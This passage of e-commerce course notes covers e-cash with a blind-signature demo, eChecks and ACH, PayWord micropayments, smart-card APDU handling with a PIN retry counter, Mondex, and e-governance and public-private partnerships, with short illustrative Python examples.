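        if serial in self.spent:
            return "rejected: double spend"   # same unique serial presented twice
        self.spent.add(serial)
        return "credited %d" % DENOMINATION

def demo():
    """Constructed flow: withdraw one coin, deposit it twice, then try a forgery."""
    issuer = Issuer()
    serial = secrets.token_bytes(16)          # constructed unique serial
    blinded, r = customer_blind(serial)
    coin_sig = customer_unblind(issuer_sign_blind(blinded), r)
    return (issuer.deposit(serial, coin_sig),        # merchant A redeems: credited
            issuer.deposit(serial, coin_sig),        # merchant B redeems the same coin
            issuer.deposit(b"fake-serial", 12345))   # no valid signature

if __name__ == "__main__":
    print(demo())
```

At withdrawal the issuer only ever sees the blinded value, and at deposit only the serial and signature, so the two events cannot be correlated; the anonymity the page mentions comes from the blinding factor r, which never leaves the customer.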

E-Cash Processing

E-cash security

Security is of extreme importance when handling online transactions. Faith in the security of the medium of exchange, whether paper or digital, is essential for the economy to function.

E-cash limits the damage a dishonest or compromised merchant can do, because no reusable credential such as a card number or password is handed over: the merchant receives only tokens worth a fixed amount, and the funds move from the customer's account to the trader's account through the issuer.


However, while accessing his account the customer must still guard against theft of the account credentials themselves. Eavesdropping and tampering on the wire are prevented by serving the site over TLS (the successor to SSL) and keeping all links on https URLs, and malware on the customer's machine is addressed with up-to-date endpoint security software.

Advantages

- We can transfer funds, purchase stocks and use a variety of other services without handling physical cash or cheques.
- Electronic cash protects its user against theft of financial details: with electronic cash the customer does not need to provide financial information to the merchant.
- E-cash supports small payments. Other online payment systems charge a fee for every transaction, however high or low; e-cash has a threshold below which no additional charge applies, so very low payments are not charged a fee.

Limitations

- However secure the e-cash payment system is, no one is safe against online fraud. Here the trader is the fraudulent party: the trader may take the amount but never provide the service.
- While making the payment it is important that the Internet connection and power supply stay up. If the connection fails while a payment is in process, the amount may be debited without reaching the trader, and refunds take a long time, in general at least 30-45 days.
- E-cash is not for everyone. Low-income segments without computer and Internet access are unable to use it.

The rise of e-cash is inevitable, but further improvements are needed. Tackling security, anonymity, low-income group readiness and technology reliability will make e-cash more complete. Countries such as India, where people were hesitant to use such methods, have shown tremendous growth in online payments and e-cash systems; slowly but steadily the growth continues, and improving the technology will make it more reliable and efficient for customers.


E-CHECK

What is an electronic check?

It is simply an electronic version of a paper check. When you convert a traditional check into an electronic payment you can process it through the Automated Clearing House (ACH) Network to save time and money, and because electronic checks carry more security features than a paper check they better protect your business and customers. Another form of electronic check is a customer paying by entering bank account details online and sending the money electronically. Electronic checks are increasingly popular because they are fast, efficient and secure. They are sometimes called eChecks, electronic check conversions or Back Office Conversions (BOCs). Below is what you need to know when considering eChecks for your business.

eCheck, a payment instrument combining the security, speed and processing efficiencies of all-electronic transactions with the familiar and well-developed legal infrastructure and business processes associated with paper checks, was the first (and at the time the only) electronic payment mechanism chosen by the United States Treasury to make high-value payments over the public Internet.

How electronic checks work

The process is simple. First you run a customer's paper check through an electronic scanner supplied by your merchant service provider. This virtual terminal captures the customer's banking information (routing and account number from the check's MICR line) and the payment amount. The information is then transferred electronically over the ACH Network, which debits the funds from your customer's account and deposits them into yours. After payment approval the virtual terminal prints a receipt for the customer to sign and keep. Your employee should then void the paper check and return it to the customer. You will be able to view and report on your merchant transactions online, although features vary by merchant service provider or payment processing solution provider.

How does the ACH Network work with eChecks?

The ACH Network is a funds distribution system that moves funds electronically from one entity to another. It is a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve. Because it transfers money directly between bank accounts, ACH is a faster payment method than traditional paper checks. The ACH payment process mirrors the paper check process, only faster: clients give their bank routing and checking account number and, after verification, the payment is submitted electronically through the ACH system. Besides checks, the ACH Network also handles debit card transactions, direct deposit of payroll, Social Security and other government benefits, direct debit payments and business-to-business payments.


Reaping the benefits of eChecks

Converting your customers' paper checks into electronic checks saves time and reduces hassle for your staff, because you can submit payments electronically instead of making trips to the bank. Time saving and hassle reduction are not the only benefits:

1. Reduce processing costs by up to 60%. eChecks require less manpower to process and do not come with deposit or transaction fees, so processing an eCheck is generally much cheaper than processing a paper check or credit card transaction.
2. Receive funds sooner. Businesses using electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing; billing companies often receive payments within one day.
3. Increase sales. If your business does not accept paper checks, offering eChecks expands your customers' options. If you are converting from paper checks to eChecks you can start accepting international and out-of-state checks, while using account validation and customer authentication to protect your business from fraud.
4. Work smarter and greener. Electronic check conversion is easy to set up and relies on the trusted ACH Network, and eChecks help reduce the more than 674 million gallons of fuel and 3.6 million tons of greenhouse gas emissions attributed to transporting paper checks.
5. Decrease errors and fraud. eChecks reduce the potential for errors and fraud because fewer people handle them. Merchant service providers also maintain, monitor and check files against negative account databases holding records of individuals or companies with a history of fraud.

Protecting your business and your customers

Electronic check conversion is one of the more secure payment methods in electronic payment processing because it layers several protections:

1. Authentication. Merchants must verify that the person providing the checking account information is authorised to use that account. Services available to merchants include digital signatures and public key cryptography. A digital signature does not encrypt the data: it is a value computed over the eCheck with the signer's private key that lets the receiver check that the message really came from that signer and was not altered afterwards. It plays the role a handwritten signature plays on a paper check, but is far harder to forge and travels with the electronic document. A digital certificate is a separate thing: it binds the signer's public key to an identity, so the receiver knows whose key verified the signature. Digital signatures are often used to implement electronic signatures, which cover any electronic data carrying the intent of a signature. In public key cryptography the private key is kept secret by the signer and used to create the signature on the eCheck; the public key is given to anyone who needs to verify that the sender signed the eCheck and that the electronic transfer has not been tampered with.
2. Duplicate detection. Financial institutions use software and operational controls to prevent and detect duplicate presentment of the scanned electronic representations of customer checks.
3. Encryption. The eCheck data and ACH files are protected in transit between merchant, processor and bank by TLS (the original text refers to 128-bit SSL); the ACH Network is a batch clearing system, so this protection must be applied on each link into it.

How to get started with electronic checks

Here is how to implement electronic check conversion as quickly and easily as possible:

1. Choose a well-established processing company. Good pricing is important, but a reliable processor is essential.
2. Notify your customers that your business will begin using electronic check conversion. Federal law requires you to post a notice about this change and give customers a takeaway copy; you must also provide a phone number for requesting more information.
3. Look for a processor that makes it easy to align your current business processes with the new electronic processing system, export customer data and integrate with your business management software.
4. QuickBooks Payments offers a complete payment processing solution: businesses can take payments in many ways, from ACH bank payments and electronic checks to credit cards including Visa, MasterCard, Discover and American Express. It also lets businesses email invoices with a Pay Now button; the vendor's own data shows businesses using QuickBooks Payments getting paid twice as fast through e-invoicing.

This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service:

1. The payer (customer or bill payer) is prompted to authorise an electronic debit and to enter the bank routing number (ABA) and account number.
2. The merchant's sales system securely transfers the order information to CyberSource over the Internet.
3. CyberSource forwards the bank routing number and account number to the processor.
4. The routing number and account number are validated and the account's check-writing history is verified; the processor returns an approve/decline result to CyberSource.
5. CyberSource returns the approval or decline message to the merchant.
6. If approved, CyberSource routes the check for settlement through a processor to the Automated Clearing House (ACH) system. Funds are deposited in approximately 1-3 business days.

Four Different Scenarios of the FSTC E-check System -


MICROPAYMENT METHODS

Traditional payment methods are called macropayment methods. A newer type, the micropayment method, is emerging to cater for very low value transactions. Examples:

- Millicent (pre-payment / credit based)
- PayWord (post-payment)


MICRO PAYMENT IS -

- Very small payments made over the Web
- Transactions too small for credit cards
- Can be as little as a fraction of a cent
- An alternative to subscription and advertising
- Can go in either direction

A micropayment is an e-commerce transaction involving a very small sum of money in exchange for something made available online, such as an application download, a service or Web-based content.

Micropayments are sometimes defined as anything less than 75 cents and can be as low as a fraction of a cent. A special type of system is required for such payments, which are too small to be feasible for processing through credit card companies, whose per-transaction fees would exceed the payment itself.

Here is one scheme for micropayments. The user and seller each establish an account with a third-party service provider who monitors, collects and distributes micropayments. The seller encodes per-fee links inside a Web page. When the user initiates a transaction, payment goes through an Internet wallet account managed by the service provider. Micropayments accumulate until they are collected as single larger payments. Such a system is helpful when a user wants to make one-time micropayments to multiple sellers; seller-based accounts are more common for repeat business with an individual enterprise.
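The aggregation idea above, and the PayWord post-payment scheme the section names, in working form as an added example that is not code from the original notes. The user commits once to the root of a hash chain, each payment reveals the next link (worth one cent here), the vendor verifies a payment with a single hash, and only the last revealed link is redeemed, so many tiny payments settle as one. Assumptions of this example: the user's signed commitment is replaced by an HMAC tag the vendor checks with a `Broker` object, and the chain length, keys and denomination are invented.

```python
"""PayWord-style hash-chain micropayments: commit to w_0 = H^n(w_n), pay by
revealing w_1, w_2, ..., redeem only the last one. Added example, not the page's code."""
import hashlib
import hmac
import secrets

def H(x: bytes) -> bytes:
    return hashlib.sha256(x).digest()

class Broker:
    """Stands in for the PKI: certifies a user's chain root, settles with vendors."""
    def __init__(self):
        self._key = secrets.token_bytes(32)
    def certify(self, root: bytes) -> bytes:
        return hmac.new(self._key, root, "sha256").digest()
    def verify(self, root: bytes, tag: bytes) -> bool:
        return hmac.compare_digest(self.certify(root), tag)

class User:
    def __init__(self, broker: Broker, chain_len: int):
        # w_n is random, w_{i-1} = H(w_i); w_0 is the root sent in the commitment
        chain = [secrets.token_bytes(32)]
        for _ in range(chain_len):
            chain.append(H(chain[-1]))
        chain.reverse()                      # chain[i] == w_i and H(w_i) == w_{i-1}
        self._chain, self._spent = chain, 0
        self.root = chain[0]
        self.tag = broker.certify(self.root)
    def pay(self):
        """Reveal the next payword; each revealed link is worth one cent."""
        self._spent += 1
        return self._spent, self._chain[self._spent]

class Vendor:
    def __init__(self, broker: Broker):
        self._broker = broker
        self._last_word, self._last_index = None, 0
    def accept_commitment(self, root: bytes, tag: bytes) -> bool:
        if not self._broker.verify(root, tag):
            return False
        self._last_word, self._last_index = root, 0
        return True
    def accept_payment(self, index: int, word: bytes) -> bool:
        """Valid iff hashing word (index - last_index) times gives last_word."""
        if self._last_word is None or index <= self._last_index:
            return False                     # no commitment, replay, or out of order
        x = word
        for _ in range(index - self._last_index):
            x = H(x)
        if x != self._last_word:
            return False
        self._last_word, self._last_index = word, index
        return True
    def owed_cents(self) -> int:
        """The vendor redeems (root, last_word, last_index) with the broker once."""
        return self._last_index

def demo():
    """Constructed session: commitment, four payments, a replay and a forgery."""
    broker = Broker()
    user, vendor = User(broker, chain_len=100), Vendor(broker)
    results = [vendor.accept_commitment(user.root, user.tag)]
    for _ in range(3):
        results.append(vendor.accept_payment(*user.pay()))
    i, w = user.pay()
    results.append(vendor.accept_payment(i, w))                            # 4th payment
    results.append(vendor.accept_payment(i, w))                            # replay
    results.append(vendor.accept_payment(i + 1, secrets.token_bytes(32)))  # forged link
    return results, vendor.owed_cents()

if __name__ == "__main__":
    print(demo())   # ([True, True, True, True, True, False, False], 4)
```

Per-payment cost on the vendor side is one hash, which is why this family of schemes was designed for fractions of a cent; the public-key operation happens once, at the commitment, and the broker sees one settlement per user-vendor session instead of one per click.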

Once a common micropayment standard is established, some experts predict that streaming media sites, music and application downloads, content vendors, sports access sites and other specialised resources will make pay-per-use common online.

Advantages and risks -

With a micropayment system many small transactions are summarised over a defined period of time and charged in one bill. For that reason micropayments suit businesses where even a small cost for every single transaction would be inefficient. The main benefits for the customer are speed and flexibility; for the merchant, speed and acceptable transaction fees are what matter. As the transactions involve small amounts, security does not have the highest priority: trust matters more than security. Users and merchants are more likely to use an insecure payment system from a trusted company than a secure payment system from an untrusted (unknown) company. The market entry barriers for new providers are therefore high: any company that wishes to enter this area must have plenty of capital and be willing to invest heavily before any return on investment, as it is extremely difficult for new payment systems to achieve widespread acceptance.

Payment options -

Micropayment providers offer various payment modules. Merchants sign up for an account with a chosen provider and decide on a module that suits their needs; the customer then gets one or more options for paying for the desired content or goods. The most common micropayment options are:

- Call2pay: payment by telephone. The customer is asked to call a premium-rate number; the per-call fee is set to the desired payment amount.
- Handypay: payment via the mobile phone bill. The customer enters his or her mobile number and receives an SMS with a TAN (one-time transaction number) to confirm the payment.
- Ebank2pay: payment using online banking. The customer authorises the transfer of the payment amount with his or her online banking credentials and a TAN; after payment the customer receives access to the purchased product.
- Credit card: the customer enters card data and confirms the transaction; optionally the transaction uses 3-D Secure (Verified by Visa, MasterCard SecureCode).
- Direct debit: the customer enters his or her bank identifier and account number and confirms the direct debit authorisation.

PayPal MicroPayments is a micropayment system that charges payments to users' PayPal accounts and allows transactions of less than US$12 to take place. As of 2013 the service was offered in select currencies only.

Micropayment Uses -

Publishing

Marketing

Software

Entertainment

Web Services

SMART CARD

A smart card, chip card or integrated circuit card (ICC) is any pocket-sized card with embedded integrated circuits. Smart cards are made of plastic, generally polyvinyl chloride, but sometimes polyethylene terephthalate based polyesters, acrylonitrile butadiene styrene or polycarbonate. Since April 2009 a Japanese company has manufactured reusable financial smart cards made from paper.

Smart cards can provide identification, authentication, data storage and application processing. They may provide strong authentication for single sign-on (SSO) within large organisations.

A smart card is any pocket-sized card with embedded integrated circuits which can process data: it can receive input (a command), process it, and deliver an output (a response), while secret keys and PIN retry counters never leave the chip.

What is a Smart Card

- Standard credit-card size with a microchip embedded in it
- Two types:
  - Memory-only chips
  - Microprocessor chips
- Could hold up to 32,000 bytes at the time of these notes
- Newer smart cards have cryptographic co-processors that perform public key operations (RSA, ECC) quickly
- In 1968 German inventors patented the combination of plastic cards with microchips
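What "receives input, processes it and delivers an output" looks like at the command level, as an added example that is not code from the original notes. A toy card in Python parses ISO 7816-4 command APDUs (CLA INS P1 P2 [Lc data] [Le]), keeps a PIN retry counter inside the card, and answers with the standard status words (9000 success, 63Cx PIN wrong with x tries left, 6983 blocked, 6982 security status not satisfied, 6A82 file not found). The PIN value, the file identifier, the file contents and the instruction subset are assumptions of this example.

```python
"""ISO 7816-4 short APDU parsing and a PIN-protected read on a toy card.
Added example; the card contents and supported instructions are invented."""
import hmac

def parse_apdu(raw: bytes):
    """CLA INS P1 P2 [Lc data] [Le] -> (cla, ins, p1, p2, data, le)."""
    if len(raw) < 4:
        raise ValueError("APDU shorter than 4-byte header")
    cla, ins, p1, p2 = raw[:4]
    body = raw[4:]
    if not body:                                   # case 1: header only
        return cla, ins, p1, p2, b"", None
    if len(body) == 1:                             # case 2: Le only (0x00 means 256)
        return cla, ins, p1, p2, b"", body[0] or 256
    lc, data, rest = body[0], body[1:1 + body[0]], body[1 + body[0]:]
    if len(data) != lc:
        raise ValueError("Lc does not match data length")
    if len(rest) > 1:
        raise ValueError("trailing bytes after Le")
    le = (rest[0] or 256) if rest else None        # case 4 / case 3
    return cla, ins, p1, p2, data, le

SW_OK, SW_SECURITY_STATUS, SW_BLOCKED = 0x9000, 0x6982, 0x6983
SW_FILE_NOT_FOUND, SW_INS_NOT_SUPPORTED = 0x6A82, 0x6D00

class ToyCard:
    """PIN, retry counter and one protected file, all living 'inside the chip'."""
    def __init__(self, pin: bytes = b"1234", max_tries: int = 3):
        self._pin, self._tries, self._max = pin, max_tries, max_tries
        self._verified, self._selected = False, None
        self._files = {0x0101: b"balance=1000"}      # assumed EF and its record

    def process(self, raw: bytes):
        """Returns (response data, status word)."""
        cla, ins, p1, p2, data, le = parse_apdu(raw)
        if ins == 0xA4:                               # SELECT by file identifier
            fid = int.from_bytes(data, "big")
            if fid not in self._files:
                return b"", SW_FILE_NOT_FOUND
            self._selected = fid
            return b"", SW_OK
        if ins == 0x20:                               # VERIFY (PIN)
            if self._tries == 0:
                return b"", SW_BLOCKED
            # decrement before comparing: a power cut mid-compare must not give a free try
            self._tries -= 1
            if hmac.compare_digest(data, self._pin):
                self._tries, self._verified = self._max, True
                return b"", SW_OK
            return b"", 0x63C0 | self._tries           # 63 Cx: failed, x tries left
        if ins == 0xB0:                               # READ BINARY from selected file
            if self._selected is None:
                return b"", SW_FILE_NOT_FOUND
            if not self._verified:
                return b"", SW_SECURITY_STATUS
            return self._files[self._selected][:le or 256], SW_OK
        return b"", SW_INS_NOT_SUPPORTED

def demo():
    """Constructed session: SELECT, READ before PIN, wrong PIN, right PIN, READ."""
    card, out = ToyCard(), []
    out.append(card.process(bytes([0x00, 0xA4, 0x00, 0x00, 0x02, 0x01, 0x01]))[1])
    out.append(card.process(bytes([0x00, 0xB0, 0x00, 0x00, 0x00]))[1])
    out.append(card.process(bytes([0x00, 0x20, 0x00, 0x01, 0x04]) + b"0000")[1])
    out.append(card.process(bytes([0x00, 0x20, 0x00, 0x01, 0x04]) + b"1234")[1])
    data, sw = card.process(bytes([0x00, 0xB0, 0x00, 0x00, 0x00]))
    out.append(sw)
    return out, data

if __name__ == "__main__":
    sws, data = demo()
    print([hex(s) for s in sws], data)
```

The retry counter is the point: because it lives in the card and is decremented before the comparison, an attacker with the card in a reader gets a bounded number of guesses, which is the property a software-only PIN check on the terminal cannot give.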

Construction of Smart Cards -


Why Smart Cards -

- Improve the convenience and security of any transaction
- Provide tamper-resistant storage of user and account identity (keys never leave the chip)
- Provide vital components of system security
- Protect against a wide range of security threats

Advantages -

Flexibility

Security

Portability

Increasing data storage capacity

Reliability

Schematic overview of a smart card


Smart card Processing

Smart Card Applications -

- Ticketless travel
  - Seoul bus system: 4M cards, 1B transactions since 1996
  - Planned: the SF Bay Area system
- Authentication ID
- Medical records
- E-cash
- Store loyalty programs
- Personal profiles
- Government
- Licenses
- Mall parking

Example: Mondex


OVERVIEW OF MONDEX

Mondex is a smart card electronic cash system, originally developed by National Westminster Bank in the United Kingdom and subsequently sold to MasterCard International. Mondex launched in a number of markets during the 1990s, expanding from an original trial in Swindon, UK, to Hong Kong, Guelph and New York. It was also trialled on several British university campuses from the late 1990s, including the University of Edinburgh, University of Exeter (between 1997 and 2001), University of York, University of Nottingham, Aston University and Sheffield Hallam University.

Features:

- Direct transfer of electronic money between two cards
- Transfer of electronic money over the Internet or telephone networks
- Transaction records kept on the card
- Password protection and "lock card" functions
- Portable balance reader to check the balance
- Support for multiple currencies


ADVANTAGES

CONSUMER -

- Convenience
- Accessibility
- On-chip record of recent transactions
- Home load
- Internet purchases

MERCHANT -

- Reliable off-line payment
- Higher security
- Low transaction cost
- Reduced cash handling

FINANCIAL INSTITUTION -

- Strengthened customer relationships
- New financial and commercial partnerships

Mondex is a concept for an electronic payment system that provides an alternative to cash, particularly small currency and coins (micropayments). The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK.

In July 1996, on the initiative of NatWest and Midland Bank PLC, Mondex International Ltd was officially established by 17 major banks from North America, Asia/Pacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept, technology and brand. In the same year MasterCard International acquired 51% ownership of Mondex International and fully endorsed the Mondex technology architecture.

How does Mondex Protect Privacy -

Principles protected:

- limits on collecting personal information
- limits on using, disclosing and keeping personal information
- keeping personal information accurate
- safeguarding personal information

Limits on collecting personal information: only

- loads from the account
- deposits into the account
- lost transactions

Limits on using, disclosing and keeping personal information: used only

- to safeguard deposits
- to reimburse for non-performance

Keeping personal information accurate:

- load and unload are online
- a rolling log of the last 10 transactions on the card gives the exact spend and retailer name

Safeguarding personal information:

- firewalls in MULTOS between applications (ITSEC E6 evaluated)
- transaction data passed to the retailer is deliberately limited
- individual transaction data is not collected by the banks: Mondex is an unaudited system


The design of a Mondex smart card allows end users to transfer funds electronically onto the card and then use it to make purchases up to the total cash value held on the card. Mondex smart cards provide an electronic payment system using all the capabilities associated with smart card technology, and can be a convenient alternative to cash.

Although the design was five years old at the time, the Mondex smart card was actually launched in 1995, two years before MasterCard assumed control of the technology.

The banks that currently support the Mondex smart card include National Bank of Canada, Scotiabank, Canada Trust, Bank of Montreal, Le Mouvement des caisses Desjardins and Toronto Dominion Bank. With so many respected lending institutions banking on the idea, the Mondex smart card is worth a closer look.

The Mondex smart card can make card-to-card transfers, which is not possible with standard credit or debit cards. When you use a credit or debit card to make a purchase, communication is required between the bank and your card. Mondex cards instead carry an embedded microprocessor with cryptographic protocols and tamper-resistant hardware designed to keep the value counters and keys out of an attacker's reach. The ability to do offline transactions makes them less dependent on expensive network infrastructure, reducing transaction costs. Offline transactions may seem anonymous; however, they are recorded in the memory of the card's microprocessor and remain retrievable the next time the card is used at an ATM, or as soon as the retailer uploads transaction data to the bank's computer.

A significant disadvantage of Mondex is that transactions are not truly anonymous. Unlike pre-paid phone cards, which are also based on smart card technology, you cannot purchase a Mondex card without revealing your identity. Each card has a unique identification number through which owners can easily be identified. Mondex smart cards have not been as successful as originally predicted, and customers have not been especially satisfied with the card and its services. Unlike a credit or debit card, your money may be lost forever if you lose a Mondex smart card: losing one is just like losing a wallet full of cash. With a credit card you are protected against any loss exceeding $50 (under US law); this protection is not available with a Mondex smart card.

Mondex states that its system is fully auditable: there is a log of the time, date, amount and participants of each transaction, which hampers the privacy of users. Technically, however, Mondex cannot claim to be fully auditable. After a number of transactions the limited memory in the Mondex smart card overflows and the oldest entries are overwritten, so significant data may be lost before Mondex is able to retrieve it. Critics say this loss of data is a critical design flaw, making it difficult for Mondex to reliably detect fraud.

While Mondex smart cards are not a hundred percent secure, the system is designed to tolerate minor fraud losses.

Mondex believes its electronic payment system is secure and is convinced that critics who have voiced concern over security issues are mistaken and misinformed. Perhaps the use of a Mondex smart card comes down to a personal level of trust.

E-GOVERNANCE

Although the term 'e-Governance' has gained currency in recent years, there is no standard definition of it. Different governments and organisations define the term to suit their own aims and objectives; sometimes 'e-government' is used instead of 'e-Governance'.

Several dimensions and factors influence the definition of e-governance or electronic governance. The word "electronic" implies technology-driven governance. E-governance is the application of information and communication technology (ICT) for delivering government services, exchanging information, communication, transactions and the integration of various stand-alone systems and services between government-to-customer (G2C), government-to-business (G2B) and government-to-government (G2G), as well as back-office processes and interactions within the entire government framework. Through e-governance, government services are made available to citizens in a convenient, efficient and transparent manner. The three main target groups in governance concepts are government, citizens and businesses/interest groups; in e-governance there are no distinct boundaries between them.

Generally four basic models are available: government-to-citizen (customer), government-to-employees, government-to-government and government-to-business.

Difference between E-Government and E-Governance -

Both terms are often treated as the same; however, there is some difference between the two. E-government is the use of ICTs in public administration, combined with organisational change and new skills, to improve public services and democratic processes and to strengthen support to the public. The problem with this definition, if it is to coincide with e-governance, is that it makes no provision for governance of the ICTs themselves. As a matter of fact, governance of ICTs most probably requires a substantial increase in regulation and policy-making capabilities, with all the expertise and opinion-shaping processes among the various social stakeholders that this entails. So the perspective of e-governance is the use of technologies that both help governing and have to be governed. Public-Private Partnership (PPP) based e-governance projects have been hugely successful in India; United Telecoms Limited (UTL) is a major player in India on PPP-based e-governance projects, each project involving a mammoth state-wide area network.

E-governance is the future many countries are looking forward to for a corruption-free

government E-government is one-way communication protocol whereas e-governance is two-

way communication protocol The essence of e-governance is to reach the beneficiary and ensure

that the services intended to reach the desired individual has been met with There should be an

auto-response to support the essence of e-governance whereby the Government realizes the

efficacy of its governance E-governance is by the governed for the governed and of the

governed

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services. Statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on the unwanted interference of too many layers while delivering governmental services. It depends on a good infrastructural setup, with the support of local processes and parameters, for governments to reach their citizens or end beneficiaries. Budgets for planning, development and growth can be derived from well laid out e-governance systems.

Why e-Governance?

E-Government can transform citizen service, provide access to information to empower citizens, enable their participation in government and enhance citizens' economic and social opportunities, so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE

A suggested architecture for e-Governance is shown in the diagram, which illustrates that applications from various departments can be integrated so as to be accessed by any terminal or computer from any other department, or from anywhere, through the network. This is possible because of the characteristics of CORBA: it is a location-transparent, language-independent, implementation-independent and operating-system-independent architecture. The applications connected through CORBA/IIOP could be legacy applications wrapped to suit the CORBA specifications, any new Web application, or even a database environment using Oracle etc. Seamless interconnection, and thereby effective utility of the entire e-Governance system, is possible if the middleware is designed to have the necessary services, such as Transactions, Data Base Management, Messaging and Naming.

Regarding security aspects, the CORBA Security standard is built around existing security specifications such as the Distributed Computing Environment (DCE), the Kerberos protocol and the Generic Security Service (GSS) API. While these technologies carry considerable weight, public-key security with Secure Sockets Layer (SSL) is popular with Internet-based transactions.

Types of Interactions in e-Governance

e-Governance facilitates interaction between different stakeholders in governance. These interactions may be described as follows.

G2G (Government to Government)

In this case, Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities. This kind of interaction is only within the sphere of government and can be both horizontal, i.e. between different government agencies as well as between different functional areas within an organization, or vertical, i.e. between national, provincial and local government agencies as well as between different levels within an organization. The primary objective is to increase efficiency, performance and output.

G2C (Government to Citizens)

In this case, an interface is created between the government and citizens which enables citizens to benefit from efficient delivery of a large range of public services. This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24 hours a day, 7 days a week), from where to interact with the government (e.g. service centre, unattended kiosk, or from one's home/workplace) and how to interact with the government (e.g. through internet, fax, telephone, email, face-to-face etc.). The primary purpose is to make government citizen-friendly.

G2B (Government to Business)

Here, e-Governance tools are used to aid the business community – providers of goods and services – to seamlessly interact with the government. The objective is to cut red tape, save time, reduce operational costs and create a more transparent business environment when dealing with the government. G2B initiatives can be transactional, such as in licensing, permits, procurement and revenue collection. They can also be promotional and facilitative, such as in trade, tourism and investment. These measures help to provide a congenial environment for businesses, enabling them to perform more efficiently.

G2E (Government to Employees)

Government is by far the biggest employer and, like any organization, it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools helps in making these interactions fast and efficient on the one hand and increases the satisfaction levels of employees on the other.

Difference between G2B and B2G

Government to business (G2B) - Refers to the conducting of transactions between government bodies and businesses via the internet.

Business to government (B2G) - Professional affairs conducted between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and the completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

• Agreement between Government and the Private Sector for the Provision of a Public Good or Service by the Latter

• Generally, but not always, involving:

  – Long Term Contracts

  – User Charges and/or Payments flowing between the Parties

  – Shared Investments, but Mainly Private

  – Risk Sharing by the Parties

• Must be a Partnership

A public-private partnership exists when public sector agencies (federal, state or local) join with private sector entities (companies, foundations, academic institutions or citizens) and enter into a business relationship to attain a commonly shared goal that also achieves the objectives of the individual partners.

Why do them?

• Fiscal Head Room

• As a Way of Financing the Project

• Separate Policy & Regulation from Operations

• Make the Good or Service Available

• Pay for Performance and Output

• Introduce Competition – For and In the Market

PREPARED BY ARUN PRATAP SINGH 48

48

The Need to Set the Right Priorities –

Four Basic Dimensions of P3

Although each is unique, all P3's include four basic characteristics:

• Shared goals

• Shared resources (time, money, expertise, people)

• Shared risks

• Shared benefits

Benefits

• Expedited project completion

• Project cost savings

• Improved quality

• Use of private resources

• Access to new sources of private capital

Two Major Steps

• Crafting the Partnership

• Implementing the Partnership

Project Management -

Six Distinct Phases

1. Genesis

   What's the need? What's driving the need (rationale)? Facility non-compliance, natural disaster, budget deficit?

   Is there a need for a Public/Private Partnership?

   Preliminary Project Definition

2. Feasibility

   Is a Public/Private Partnership feasible, not only financially but practically? Can it be done?

   Market Research; Economic/Financial Analysis; Program, Budget and Schedule; Risk Analysis

3. Plan and Test

   Final project definition: what is the best way to complete the project?

   Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback and economics?

   Master Schedule/Budget; Political Climate; any potential "fatal flaws" that could derail the project

4. Procurement and Contracting

   How do you choose and contract with the best-value private partner?

   What's the best delivery method? Design-Bid-Build, Design-Build, Finance-Design-Build

   What do current statutes allow?

   Procurement Approach: Sole Source, RFP, Low Bid

   Risk Allocation between Public and Private Partners; Structuring of Contract/Risks and Rewards

5. Implement

   Environmental; Design; Permitting; Construction; Commissioning and Administration

6. Operate

   Startup; Monitoring; Assessment; Enhancement; Contract Modifications; Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest the efficiencies gained from ICT-enabled public administrations.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure, a repository of electronic information on government laws and policies (including links to archived information and downloadable forms) and a high level of comfort with ICT among citizens and businesses. Countries with the highest readiness index also tend to have a large number of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites: one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services, and thus a leading indicator of countries' readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1. INTRODUCTION. The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will depend heavily on the trust they have in the data security of the service.

2. INFORMATION SECURITY. A central challenge of e-Government services is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:

• understanding an organization's information security requirements and the need to establish policy and objectives for information security;

• implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;

• monitoring and reviewing the performance and effectiveness of the ISMS, with continual improvement based on objective measurement.

Data security requires a set of security requirements:

• Authentication - the capability to identify who is using the services (a person or a software program); the process of verifying that you are who you say you are.

• Authorization - the capability to grant access rights to resources; the process of verifying that someone has the right to do what she is trying to do.

• Confidentiality - the capability to prevent unauthorized access to information.

• Integrity - the capability to prevent unauthorized modification of information, ensuring that information can be relied upon and is accurate and complete.

• Traceability - the capability to chronologically relate any transaction to the person or system that performed the action, in a way that is verifiable.

